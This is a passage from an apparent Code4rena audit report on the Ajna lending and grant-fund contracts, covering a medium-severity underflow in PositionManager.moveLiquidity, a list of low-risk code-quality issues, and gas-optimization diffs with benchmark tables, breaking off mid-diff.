- etc…
Thank you.
Picodes (judge) increased severity to Medium and commented:
@Haipls - your point is valid:
should implementnonces
. I was reluctant to give this Medium severity as there are issues inPermitERC721
so the contract couldn’t implement the EIP anyway, but, after reflection and discussing it with another judge, the problem is significant enough to justify Medium severity.
[M-14] PositionManager.moveLiquidity
could revert due to underflow
Submitted by 0xnev, also found by mrpathfindr and 0xnev
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
) = IPool(params_.pool).bucketInfo(params_.fromIndex);
// check that bucket hasn't gone bankrupt since memorialization
if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
// calculate the max amount of quote tokens that can be moved, given the tracked LP
vars.maxQuote = _lpToQuoteToken(
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
// remove bucket index from which liquidity is moved from tracked positions
if (!positionIndex.remove(params_.fromIndex)) revert RemovePositionFailed();
// update bucket set at which a position has liquidity
// slither-disable-next-line unused-return
// move quote tokens in pool
) = IPool(params_.pool).moveQuoteToken(
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
toPosition.depositTime = vars.depositTime;
emit MoveLiquidity(
If lp position is worth more than when at deposit time based on amount of quote token moved which could likely be the case due to interest accrued or simply from exchange rates favoring quote token, moveLiquidity
could revert due to underflow as vars.lpbAmountFrom
could be greater than fromPosition.lps
(i.e. vars.lpbAmountFrom > fromPosition.lps
Since call to Position.moveLiquidity()
is supposed to move all lp positions attached to associated NFT within a bucket, we can simply delete the fromPosition
mapping to remove bucket index at which a position has moved liquidity to prevent potential cases where Position.moveLiquidity()
could revert due to underflow in this line:
fromPosition.lps -= vars.lpbAmountFrom;
LP tracked by position manager at bucket index should be deleted similar to redeemPositions
, if not Position.moveLiquidity
can likely underflow.
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
// update position LP state
fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
toPosition.depositTime = vars.depositTime;
++ delete fromPosition
emit MoveLiquidity(
Low Risk and Non-Critical Issues
For this audit, 39 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by rbserver received the top score from the judge.
The following wardens also submitted reports: MohammedRizwan, Bason, lfzkoala, naman1778, pontifex, yjrwkk, teawaterwire, Jerry0x, Aymen0909, DadeKuma, REACH, nadin, lukris02, GG_Security, sakshamguruji, descharre, bytes032, hals, patitonar, BGSecurity, squeaky_cactus, Shogoki, wonjun, T1MOH, aviggiano, fatherOfBlocks, Audit_Avengers, ayden, UniversalCrypto, ABAIKUNANBAEV, 0xnev, berlin-101, kodyvim, codeslide, Jorgect, BRONZEDISC, kaveyjoe, and Sathish9098.
Issue | |
[02] | AMBIGUITY IN StandardFunding._standardProposalState FUNCTION |
[03] | ExtraordinaryFundingProposal.votesReceived IN ExtraordinaryFunding CONTRACT IS uint120 INSTEAD OF uint128 |
[04] | CALLING ExtraordinaryFunding.proposeExtraordinary AND StandardFunding.proposeStandard FUNCTIONS CAN REVERT AND WASTE GAS |
[05] | CODE COMMENT IN ExtraordinaryFunding._extraordinaryProposalSucceeded FUNCTION CAN BE INCORRECT |
[07] | SETTING support TO 1 WHEN voteParams_.votesUsed < 0 IS FALSE IN StandardFunding._fundingVote FUNCTION IS REDUNDANT |
[08] | REDUNDANT EXECUTION OF if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower() IN StandardFunding._fundingVote FUNCTION |
[11] | uint256 CAN BE USED INSTEAD OF uint |
are hardcoded and assume that the number of blocks per day is 7200 and the number of seconds per block is 12. Yet, it is possible that the number of seconds per block is more or less than 12 due to network traffic and future chain upgrades. When the number of seconds per block is no longer 12, the durations corresponding to CHALLENGE_PERIOD_LENGTH
are no longer 7, 90, 10, and 30 days, which break the duration specifications for various phases. This can cause unexpectedness to users; for example, when the duration for FUNDING_PERIOD_LENGTH
becomes less than 10 days, a user, who expects that she or he could vote on the 10th day, can fail to vote unexpectedly on that 10th day. To avoid unexpectedness and disputes, please consider using block.timestamp
instead of blocks for defining durations for various phases in the StandardFunding
and ExtraordinaryFunding
* @notice Length of the challengephase of the distribution period in blocks.
* @dev Roughly equivalent to the number of blocks in 7 days.
* @dev The period in which funded proposal slates can be checked in updateSlate.
uint256 internal constant CHALLENGE_PERIOD_LENGTH = 50400;
* @notice Length of the distribution period in blocks.
* @dev Roughly equivalent to the number of blocks in 90 days.
uint48 internal constant DISTRIBUTION_PERIOD_LENGTH = 648000;
* @notice Length of the funding phase of the distribution period in blocks.
* @dev Roughly equivalent to the number of blocks in 10 days.
uint256 internal constant FUNDING_PERIOD_LENGTH = 72000;
* @notice The maximum length of a proposal's voting period, in blocks.
uint256 internal constant MAX_EFM_PROPOSAL_LENGTH = 216_000; // number of blocks in one month
[02] AMBIGUITY IN StandardFunding._standardProposalState
When block.number
is bigger than _distributions[proposal.distributionId].endBlock
, it is possible that the proposal is in the challenge phase. In the challenge phase, calling the following StandardFunding._standardProposalState
function, which further calls the StandardFunding._standardFundingVoteSucceeded
function below, can return ProposalState.Succeeded
if the proposal is found in _fundedProposalSlates[_distributions[distributionId].fundedSlateHash]
at that moment. However, during the challenge phase, the StandardFunding.updateSlate
function below can be called to update _fundedProposalSlates
for the mentioned _distributions[distributionId].fundedSlateHash]
. Such update can exclude the same proposal from _fundedProposalSlates[_distributions[distributionId].fundedSlateHash]
; calling the StandardFunding._standardProposalState
function again would then return ProposalState.Defeated
for such proposal. Hence, the StandardFunding._standardProposalState
function cannot properly determine the status of the corresponding proposal in the challenge phase. To prevent users from being misled, please update the StandardFunding._standardProposalState
function to return a state, which is not Succeeded
or Defeated
, to indicate that the proposal’s success state is to be determined when the time is in the challenge phase.
function _standardProposalState(uint256 proposalId_) internal view returns (ProposalState) {
Proposal memory proposal = _standardFundingProposals[proposalId_];
if (proposal.executed) return ProposalState.Executed;
else if (_distributions[proposal.distributionId].endBlock >= block.number) return ProposalState.Active;
else if (_standardFundingVoteSucceeded(proposalId_)) return ProposalState.Succeeded;
else return ProposalState.Defeated;
function _standardFundingVoteSucceeded(
uint256 proposalId_
) internal view returns (bool) {
uint24 distributionId = _standardFundingProposals[proposalId_].distributionId;
return _findProposalIndex(proposalId_, _fundedProposalSlates[_distributions[distributionId].fundedSlateHash]) != -1;
function updateSlate(
uint256[] calldata proposalIds_,
uint24 distributionId_
) external override returns (bool newTopSlate_) {
// if slate of proposals is new top slate, update state
if (newTopSlate_) {
uint256[] storage existingSlate = _fundedProposalSlates[newSlateHash];
for (uint i = 0; i < numProposalsInSlate; ) {
// update list of proposals to fund
unchecked { ++i; }
// update hash to point to the new leading slate of proposals
currentDistribution.fundedSlateHash = newSlateHash;
emit FundedSlateUpdated(
[03] ExtraordinaryFundingProposal.votesReceived
IN ExtraordinaryFunding
INSTEAD OF uint128
In the StandardFunding
contract, Proposal.votesReceived
is uint128
struct Proposal {
uint128 votesReceived; // accumulator of screening votes received by a proposal
Yet, in the ExtraordinaryFunding
contract, ExtraordinaryFundingProposal.votesReceived
is uint120
. Calling the ExtraordinaryFunding.voteExtraordinary
function below by a user, who has the voting power being more than type(uint120).max
, can revert, which causes such user to waste gas and fail to vote for the corresponding proposal. This degrades the user experience because such user, who is familiar with Proposal.votesReceived
in the StandardFunding
contract, could think that ExtraordinaryFundingProposal.votesReceived
in the ExtraordinaryFunding
contract would be uint128
as well. To be more consistent and prevent disputes, please consider using ExtraordinaryFundingProposal.votesReceived
as uint128
instead of uint120
in the ExtraordinaryFunding
struct ExtraordinaryFundingProposal {
uint120 votesReceived; // Total votes received for this proposal.
function voteExtraordinary(
uint256 proposalId_
) external override returns (uint256 votesCast_) {
// check voting power at snapshot block and update proposal votes
votesCast_ = _getVotesExtraordinary(msg.sender, proposalId_);
proposal.votesReceived += SafeCast.toUint120(votesCast_);
[04] CALLING ExtraordinaryFunding.proposeExtraordinary
AND StandardFunding.proposeStandard
Calling the following ExtraordinaryFunding.proposeExtraordinary
and StandardFunding.proposeStandard
functions will call the Funding._validateCallDatas
function below. Calling the Funding._validateCallDatas
function will revert if targets_[i] != ajnaTokenAddress || values_[i] != 0
is true. Hence, the ExtraordinaryFunding.proposeExtraordinary
and StandardFunding.proposeStandard
functions cannot be used to create proposals for calling addresses other than ajnaTokenAddress
or sending ETH. When users are unaware of this, they could believe that proposals for general purposes can be created and executed; yet, because calling ExtraordinaryFunding.proposeExtraordinary
and StandardFunding.proposeStandard
functions with targets_
being not ajnaTokenAddress
or values_
being positive revert, these users would waste their gas for nothing. To avoid confusion and disputes, please consider updating the ExtraordinaryFunding.proposeExtraordinary
and StandardFunding.proposeStandard
functions so targets_
and values_
would only be ajnaTokenAddress
and 0 and not be specified by users.
function proposeExtraordinary(
uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_) external override returns (uint256 proposalId_) {
uint128 totalTokensRequested = _validateCallDatas(targets_, values_, calldatas_);
function proposeStandard(
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_
) external override returns (uint256 proposalId_) {
newProposal.tokensRequested = _validateCallDatas(targets_, values_, calldatas_); // check proposal parameters are valid and update tokensRequested
function _validateCallDatas(
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_
) internal view returns (uint128 tokensRequested_) {
// check params have matching lengths
if (targets_.length == 0 || targets_.length != values_.length || targets_.length != calldatas_.length) revert InvalidProposal();
for (uint256 i = 0; i < targets_.length;) {
// check targets and values params are valid
if (targets_[i] != ajnaTokenAddress || values_[i] != 0) revert InvalidProposal();
[05] CODE COMMENT IN ExtraordinaryFunding._extraordinaryProposalSucceeded
In the following ExtraordinaryFunding._extraordinaryProposalSucceeded
function, the comment for (votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage))
is succeeded if proposal's votes received doesn't exceed the minimum threshold required
. However, (votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage))
can only be true when the proposal’s votes received meet or exceed such minimum threshold, which is the opposite of the comment. To prevent confusion, please consider updating the comment to match the corresponding code.
function _extraordinaryProposalSucceeded(
uint256 proposalId_,
uint256 tokensRequested_
) internal view returns (bool) {
uint256 votesReceived = uint256(_extraordinaryFundingProposals[proposalId_].votesReceived);
uint256 minThresholdPercentage = _getMinimumThresholdPercentage();
// succeeded if proposal's votes received doesn't exceed the minimum threshold required
(votesReceived >= tokensRequested_ + _getSliceOfNonTreasury(minThresholdPercentage))
// succeeded if tokens requested are available for claiming from the treasury
(tokensRequested_ <= _getSliceOfTreasury(Maths.WAD - minThresholdPercentage))
The challenge phase starts after the time for DISTRIBUTION_PERIOD_LENGTH
is finished. The time for CHALLENGE_PERIOD_LENGTH
is more of an addition to the distribution period instead of part of the distribution period. Thus, describing CHALLENGE_PERIOD_LENGTH
as Length of the challengephase of the distribution period
is described as Length of the distribution period
is somewhat misleading. To avoid confusion, the comment for CHALLENGE_PERIOD_LENGTH
can be updated to indicate that CHALLENGE_PERIOD_LENGTH
* @notice Length of the challengephase of the distribution period in blocks.
* @dev Roughly equivalent to the number of blocks in 7 days.
* @dev The period in which funded proposal slates can be checked in updateSlate.
uint256 internal constant CHALLENGE_PERIOD_LENGTH = 50400;
* @notice Length of the distribution period in blocks.
* @dev Roughly equivalent to the number of blocks in 90 days.
uint48 internal constant DISTRIBUTION_PERIOD_LENGTH = 648000;
[07] SETTING support
TO 1
WHEN voteParams_.votesUsed < 0
IS FALSE IN StandardFunding._fundingVote
When calling the following StandardFunding._fundingVote
function, uint8 support = 1
is executed before voteParams_.votesUsed < 0 ? support = 0 : support = 1
. Therefore, when voteParams_.votesUsed < 0
is false, support
does not need to be set to 1
again. Please consider refactoring the code to only update support
to 0
when voteParams_.votesUsed < 0
is true.
function _fundingVote(
QuarterlyDistribution storage currentDistribution_,
Proposal storage proposal_,
address account_,
QuadraticVoter storage voter_,
FundingVoteParams memory voteParams_
) internal returns (uint256 incrementalVotesUsed_) {
uint8 support = 1;
uint256 proposalId = proposal_.proposalId;
// determine if voter is voting for or against the proposal
voteParams_.votesUsed < 0 ? support = 0 : support = 1;
[08] REDUNDANT EXECUTION OF if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower()
IN StandardFunding._fundingVote
The following StandardFunding._fundingVote
function executes if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower()
before uint128 cumulativeVotePowerUsed = SafeCast.toUint128(sumOfTheSquareOfVotesCast)
. Because calling the SafeCast.toUint128
function below would revert when sumOfTheSquareOfVotesCast > type(uint128).max
is true, executing if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower()
becomes redundant. Please consider removing if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower()
from the StandardFunding._fundingVote
function _fundingVote(
QuarterlyDistribution storage currentDistribution_,
Proposal storage proposal_,
address account_,
QuadraticVoter storage voter_,
FundingVoteParams memory voteParams_
) internal returns (uint256 incrementalVotesUsed_) {
// calculate the cumulative cost of all votes made by the voter
// and check that attempted votes cast doesn't overflow uint128
uint256 sumOfTheSquareOfVotesCast = _sumSquareOfVotesCast(votesCast);
if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower();
uint128 cumulativeVotePowerUsed = SafeCast.toUint128(sumOfTheSquareOfVotesCast);
function toUint128(uint256 value) internal pure returns (uint128) {
require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits");
return uint128(value);
[09] InvalidVote
The following StandardFunding.fundingVote
and StandardFunding.screeningVote
functions can revert with the InvalidVote
error for various reasons. Yet, executing revert InvalidVote()
does not describe the specific reason. To be more descriptive and user-friendly, please consider updating the InvalidVote
error so it can provide the reason why calling the corresponding function reverts.
function fundingVote(
FundingVoteParams[] memory voteParams_
) external override returns (uint256 votesCast_) {
uint256 endBlock = currentDistribution.endBlock;
uint256 screeningStageEndBlock = _getScreeningStageEndBlock(endBlock);
// check that the funding stage is active
if (block.number <= screeningStageEndBlock || block.number > endBlock) revert InvalidVote();
for (uint256 i = 0; i < numVotesCast; ) {
Proposal storage proposal = _standardFundingProposals[voteParams_[i].proposalId];
// check that the proposal is part of the current distribution period
if (proposal.distributionId != currentDistributionId) revert InvalidVote();
// check that the proposal being voted on is in the top ten screened proposals
if (_findProposalIndex(voteParams_[i].proposalId, _topTenProposals[currentDistributionId]) == -1) revert InvalidVote();
function screeningVote(
ScreeningVoteParams[] memory voteParams_
) external override returns (uint256 votesCast_) {
QuarterlyDistribution memory currentDistribution = _distributions[_currentDistributionId];
// check screening stage is active
if (block.number < currentDistribution.startBlock || block.number > _getScreeningStageEndBlock(currentDistribution.endBlock)) revert InvalidVote();
uint256 numVotesCast = voteParams_.length;
for (uint256 i = 0; i < numVotesCast; ) {
Proposal storage proposal = _standardFundingProposals[voteParams_[i].proposalId];
// check that the proposal is part of the current distribution period
if (proposal.distributionId != currentDistribution.id) revert InvalidVote();
It is a common practice to separate each 3 digits in a number by an underscore to improve code readability. Unlike MAX_EFM_PROPOSAL_LENGTH
below, the following CHALLENGE_PERIOD_LENGTH
do not use underscores; please consider adding underscores for these numbers.
uint256 internal constant CHALLENGE_PERIOD_LENGTH = 50400;
uint48 internal constant DISTRIBUTION_PERIOD_LENGTH = 648000;
uint256 internal constant FUNDING_PERIOD_LENGTH = 72000;
uint256 internal constant MAX_EFM_PROPOSAL_LENGTH = 216_000; // number of blocks in one month
[11] uint256
Both uint
and uint256
are used in the protocol’s code. In favor of explicitness, please consider using uint256
instead of uint
in the following code.
208: for (uint i = 0; i < numFundedProposals; ) {
324: for (uint i = 0; i < numProposalsInSlate; ) {
434: for (uint i = 0; i < numProposalsInSlate_; ) {
468: for (uint i = 0; i < numProposals; ) {
469: for (uint j = i + 1; j < numProposals; ) {
491: for (uint i = 0; i < proposalIdSubset_.length;) {
For better readability, spaces can be added in code where appropriate.
A space can be added between challenge
and phase
in the following comment.
* @notice Length of the challengephase of the distribution period in blocks.
A space can be added between returns
and (uint256
in the following code.
) external override returns(uint256 rewardClaimed_) {
A space can be added between currentSlateHash
and !=
in the following code.
(currentSlateHash!= 0 && sum > _sumProposalFundingVotes(_fundedProposalSlates[currentSlateHash]));
Additional Low Risk and Non-Critical Issues
The following individual submissions from rbserver also detail low risk and non-critical issues. The judge considered these alongside rbserver’s report above in determining the top score. For full details and discussions, please view the original submissions linked below.
contract’s functionalities for proposals with positivetokensRequested
can be DOS’ed for_distributions[1]
- Users are able to call
function to claim delegate rewards whenblock.number
is end block of challenge period in which challenge period is not ended though they should not be allowed to do so StandardFunding._getDelegateReward
function does not factor in votes used by user during screening stage for calculating user’s delegate reward- User can receive 0 delegate reward though she or he should receive a positive amount of such reward
function does not take into account user’s available votes between snapshot blocks- Calling
function can causefundsAvailable
for new distribution period to be less than it should be - User can call
function to frontrun other user’sStandardFunding.updateSlate
Gas Optimizations
For this audit, 32 reports were submitted by wardens detailing gas optimizations. The report highlighted below by JCN received the top score from the judge.
The following wardens also submitted reports: 0xSmartContract, pontifex, SS](https://github.com/code-423n4/2023-05-ajna-findings/issues/482), Walter, petrichor, Rageur, Kenshin, 0x73696d616f, yongskiws, SAQ, Shubham, Tomio, descharre, j4ld1na, Aymen0909, 0xnev, patitonar, Raihan, ReyAdmirado, [hunter\w3b](https://github.com/code-423n4/2023-05-ajna-findings/issues/302), kaveyjoe, SAAJ, Audit_Avengers, Blckhv, ayden, K42, codeslide, Eurovickk, dicethedev, and okolicodes.
A majority of the optimizations were benchmarked via the protocol’s tests, i.e. using the following config for ajna-core
: solc version 0.8.14
, optimizer on
, 500 runs
and the following config for ajna-grants
: solc version 0.8.16
, optimizer on
, 1000000 runs
. Optimizations that were not benchmarked are explained via EVM gas costs and opcodes.
Below are the overall average gas savings for the following tested functions, with all the optimizations applied (not including G-11, G-12, and G-14): | Function | Before | After | Avg Gas Savings | | ------ | -------- | -------- | ------- | | GrantFund.claimDelegateReward | 65340 | 42268 | 23072 | | GrantFund.executeExtraordinary | 95823 | 95682 | 141 | | GrantFund.executeStandard | 47894 | 47520 | 374 | | GrantFund.fundTreasury | 65872 | 65788 | 84 | | GrantFund.fundingVote | 409345 | 396776 | 12569 | | GrantFund.proposeExtraordinary | 86505 | 86451 | 54 | | GrantFund.proposeStandard | 82900 | 82820 | 80 | | GrantFund.screeningVote | 399146 | 390626 | 8520 | | GrantFund.startNewDistributionPeriod | 75597 | 75139 | 458 | | GrantFund.updateSlate | 318329 | 310231 | 8098 | | GrantFund.voteExtraordinary | 31424 | 30811 | 613 | | PositionManager.burn | 10451 | 8524 | 1927 | | PositionManager.memorializePositions | 1134444 | 1133268 | 1176 | | PositionManager.mint | 98876 | 97653 | 1223 | | PositionManager.permit | 54387 | 32554 | 21833 | | RewardsManager.claimRewards | 393064 | 381560 | 11504 | | RewardsManager.moveStakedLiquidity | 2112272 | 2081035 | 31237 |
Total gas saved across all listed functions: 122963
- The
, and# of calls
differs between each test since fuzzing it used. Therefore, we will examine the differences in theMax
column, which stays the same, in order to calculate the gas difference. - The Gas report output, after all optimizations have been applied, can be found at the end of the report.
- The final diffs for each contract, with all the optimizations applied, can be found here.
Gas Optimizations
Number | Issue | Instances |
[G-01] | Use calldata instead of memory for function arguments that do not get mutated | 19 |
[G-02] | State variables can be cached instead of re-reading them from storage | 6 |
[G-03] | Refactor internal function to avoid unnecessary SLOAD | 1 |
[G-04] | Using storage instead of memory for structs/arrays saves gas | 11 |
[G-05] | Avoid emitting storage values | 1 |
[G-06] | Multiple accesses of a mapping/array should use a storage pointer | 14 |
[G-07] | Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate | 3 |
[G-08] | Usage of uints/ints smaller than 32 bytes (256 bits) incurs overhead | 2 |
[G-09] | Use do while loops instead of for loops |
14 |
[G-10] | Use assembly to perform efficient back-to-back calls | 2 |
[G-11] | Refactor event to avoid emitting data that is already present in transaction data | 2 |
[G-12] | Refactor event to avoid emitting empty data | 5 |
[G-13] | Sort array offchain to check duplicates in O(n) instead of O(n^2) | 1 |
[G-01] Use calldata instead of memory for function arguments that do not get mutated
When you specify a data location as memory
, that value will be copied into memory. When you specify the location as calldata
, the value will stay static within calldata. If the value is a large, complex type, using memory
may result in extra memory expansion costs.
Note: We are not able to change _hashProposals
, _validateCallDatas
, and proposeExtraordinary
to take calldata
arguments due to stack too deep
Total Instances: 19
Gas Savings for RewardsManager.moveStakedLiquidity
, obtained via protocol’s tests: Avg 1195 gas
Max | |
Before | 2112272 |
After | 2111077 |
File: ajna-core/src/RewardsManager.sol
135: function moveStakedLiquidity(
136: uint256 tokenId_,
137: uint256[] memory fromBuckets_,
138: uint256[] memory toBuckets_,
139: uint256 expiry_
140: ) external nonReentrant override {
diff --git a/src/RewardsManager.sol b/src/RewardsManager.sol
index 314b476..2e263b4 100644
--- a/src/RewardsManager.sol
+++ b/src/RewardsManager.sol
@@ -134,8 +134,8 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
function moveStakedLiquidity(
uint256 tokenId_,
- uint256[] memory fromBuckets_,
- uint256[] memory toBuckets_,
+ uint256[] calldata fromBuckets_,
+ uint256[] calldata toBuckets_,
uint256 expiry_
) external nonReentrant override {
StakeInfo storage stakeInfo = stakes[tokenId_];
@@ -147,16 +147,18 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
if (fromBucketLength != toBuckets_.length) revert MoveStakedLiquidityInvalid();
address ajnaPool = stakeInfo.ajnaPool;
- uint256 curBurnEpoch = IPool(ajnaPool).currentBurnEpoch();
+ { // to fix `stack too deep` error
+ uint256 curBurnEpoch = IPool(ajnaPool).currentBurnEpoch();
- // claim rewards before moving liquidity, if any
- _claimRewards(
- stakeInfo,
- tokenId_,
- curBurnEpoch,
- false,
- ajnaPool
- );
+ // claim rewards before moving liquidity, if any
+ _claimRewards(
+ stakeInfo,
+ tokenId_,
+ curBurnEpoch,
+ false,
+ ajnaPool
+ );
+ }
uint256 fromIndex;
uint256 toIndex;
Gas Savings for GrantFund.fundingVote
, obtained via protocol’s tests: Avg 1589 gas
Max | |
Before | 409345 |
After | 407756 |
File: ajna-grants/src/grants/base/StandardFunding.sol
519: function fundingVote(
520: FundingVoteParams[] memory voteParams_
521: ) external override returns (uint256 votesCast_) {
612: function _fundingVote(
613: QuarterlyDistribution storage currentDistribution_,
614: Proposal storage proposal_,
615: address account_,
616: QuadraticVoter storage voter_,
617: FundingVoteParams memory voteParams_
618: ) internal returns (uint256 incrementalVotesUsed_) {
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..88f37a0 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -517,31 +517,33 @@ abstract contract StandardFunding is Funding, IStandardFunding {
/// @inheritdoc IStandardFunding
function fundingVote(
- FundingVoteParams[] memory voteParams_
+ FundingVoteParams[] calldata voteParams_
) external override returns (uint256 votesCast_) {
uint24 currentDistributionId = _currentDistributionId;
QuarterlyDistribution storage currentDistribution = _distributions[currentDistributionId];
QuadraticVoter storage voter = _quadraticVoters[currentDistributionId][msg.sender];
- uint256 endBlock = currentDistribution.endBlock;
+ { // @audit: needed to fix `stack too deep` error
+ uint256 endBlock = currentDistribution.endBlock;
- uint256 screeningStageEndBlock = _getScreeningStageEndBlock(endBlock);
+ uint256 screeningStageEndBlock = _getScreeningStageEndBlock(endBlock);
- // check that the funding stage is active
- if (block.number <= screeningStageEndBlock || block.number > endBlock) revert InvalidVote();
+ // check that the funding stage is active
+ if (block.number <= screeningStageEndBlock || block.number > endBlock) revert InvalidVote();
- uint128 votingPower = voter.votingPower;
+ uint128 votingPower = voter.votingPower;
- // if this is the first time a voter has attempted to vote this period,
- // set initial voting power and remaining voting power
- if (votingPower == 0) {
+ // if this is the first time a voter has attempted to vote this period,
+ // set initial voting power and remaining voting power
+ if (votingPower == 0) {
- // calculate the voting power available to the voting power in this funding stage
- uint128 newVotingPower = SafeCast.toUint128(_getVotesFunding(msg.sender, votingPower, voter.remainingVotingPower, screeningStageEndBlock));
+ // calculate the voting power available to the voting power in this funding stage
+ uint128 newVotingPower = SafeCast.toUint128(_getVotesFunding(msg.sender, votingPower, voter.remainingVotingPower, screeningStageEndBlock));
- voter.votingPower = newVotingPower;
- voter.remainingVotingPower = newVotingPower;
+ voter.votingPower = newVotingPower;
+ voter.remainingVotingPower = newVotingPower;
+ }
uint256 numVotesCast = voteParams_.length;
@@ -614,7 +616,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
Proposal storage proposal_,
address account_,
QuadraticVoter storage voter_,
- FundingVoteParams memory voteParams_
+ FundingVoteParams calldata voteParams_
) internal returns (uint256 incrementalVotesUsed_) {
uint8 support = 1;
uint256 proposalId = proposal_.proposalId;
Gas Savings for GrantFund.screeningVote
, obtained via protocol’s tests: Avg 2678 gas
Max | |
Before | 399146 |
After | 396468 |
File: ajna-grants/src/grants/base/StandardFunding.sol
572: function screeningVote(
573: ScreeningVoteParams[] memory voteParams_
574: ) external override returns (uint256 votesCast_) {
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..550cf53 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -570,7 +570,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
/// @inheritdoc IStandardFunding
function screeningVote(
- ScreeningVoteParams[] memory voteParams_
+ ScreeningVoteParams[] calldata voteParams_
) external override returns (uint256 votesCast_) {
QuarterlyDistribution memory currentDistribution = _distributions[_currentDistributionId];
Gas Savings for GrantFund.hashProposal
, obtained via protocol’s tests: Avg 127 gas
Max | |
Before | 3843 |
After | 3716 |
File: ajna-grants/src/grants/GrantFund.sol
22: function hashProposal(
23: address[] memory targets_,
24: uint256[] memory values_,
25: bytes[] memory calldatas_,
26: bytes32 descriptionHash_
27: ) external pure override returns (uint256 proposalId_) {
diff --git a/src/grants/GrantFund.sol b/src/grants/GrantFund.sol
index 3d568b0..4c21753 100644
--- a/src/grants/GrantFund.sol
+++ b/src/grants/GrantFund.sol
@@ -20,9 +20,9 @@ contract GrantFund is IGrantFund, ExtraordinaryFunding, StandardFunding {
/// @inheritdoc IGrantFund
function hashProposal(
- address[] memory targets_,
- uint256[] memory values_,
- bytes[] memory calldatas_,
+ address[] calldata targets_,
+ uint256[] calldata values_,
+ bytes[] calldata calldatas_,
bytes32 descriptionHash_
) external pure override returns (uint256 proposalId_) {
proposalId_ = _hashProposal(targets_, values_, calldatas_, descriptionHash_);
The instances below do not save a lot of gas because they each call _hashProposal
, which loads all the calldata arrays into memory so even if all the parameters are set to calldata
they will all eventually be loaded into memory in the _hashProposal
. In addition, some parameters in proposeStandard
must stay as memory
due to stack too deep
Gas Savings for GrantFund.executeExtraordinary
, obtained via protocol’s tests: Avg 64 gas
Max | |
Before | 95823 |
After | 95759 |
Gas Savings for GrantFund.executeStandard
, obtained via protocol’s tests: Avg 64 gas
Max | |
Before | 47894 |
After | 47830 |
Gas Savings for GrantFund.proposeStandard
, obtained via protocol’s tests: Avg 46 gas
Max | |
Before | 82900 |
After | 82854 |
File: ajna-grants/src/grants/base/Funding.sol
52: function _execute(
53: uint256 proposalId_,
54: address[] memory targets_,
55: uint256[] memory values_,
56: bytes[] memory calldatas_
57: ) internal {
56: function executeExtraordinary(
57: address[] memory targets_,
58: uint256[] memory values_,
59: bytes[] memory calldatas_,
60: bytes32 descriptionHash_
61: ) external nonReentrant override returns (uint256 proposalId_) {
343: function executeStandard(
344: address[] memory targets_,
345: uint256[] memory values_,
346: bytes[] memory calldatas_,
347: bytes32 descriptionHash_
348: ) external nonReentrant override returns (uint256 proposalId_) {
366: function proposeStandard(
367: address[] memory targets_,
368: uint256[] memory values_,
369: bytes[] memory calldatas_,
370: string memory description_
371: ) external override returns (uint256 proposalId_) {
diff --git a/src/grants/base/Funding.sol b/src/grants/base/Funding.sol
index 72fafb9..d5c58d1 100644
--- a/src/grants/base/Funding.sol
+++ b/src/grants/base/Funding.sol
@@ -51,9 +51,9 @@ abstract contract Funding is IFunding, ReentrancyGuard {
function _execute(
uint256 proposalId_,
- address[] memory targets_,
- uint256[] memory values_,
- bytes[] memory calldatas_
+ address[] calldata targets_,
+ uint256[] calldata values_,
+ bytes[] calldata calldatas_
) internal {
// use common event name to maintain consistency with tally
emit ProposalExecuted(proposalId_);
diff --git a/src/grants/base/ExtraordinaryFunding.sol b/src/grants/base/ExtraordinaryFunding.sol
index 4a70abb..43bba61 100644
--- a/src/grants/base/ExtraordinaryFunding.sol
+++ b/src/grants/base/ExtraordinaryFunding.sol
@@ -54,9 +54,9 @@ abstract contract ExtraordinaryFunding is Funding, IExtraordinaryFunding {
/// @inheritdoc IExtraordinaryFunding
function executeExtraordinary(
- address[] memory targets_,
- uint256[] memory values_,
- bytes[] memory calldatas_,
+ address[] calldata targets_,
+ uint256[] calldata values_,
+ bytes[] calldata calldatas_,
bytes32 descriptionHash_
) external nonReentrant override returns (uint256 proposalId_) {
proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, descriptionHash_)));
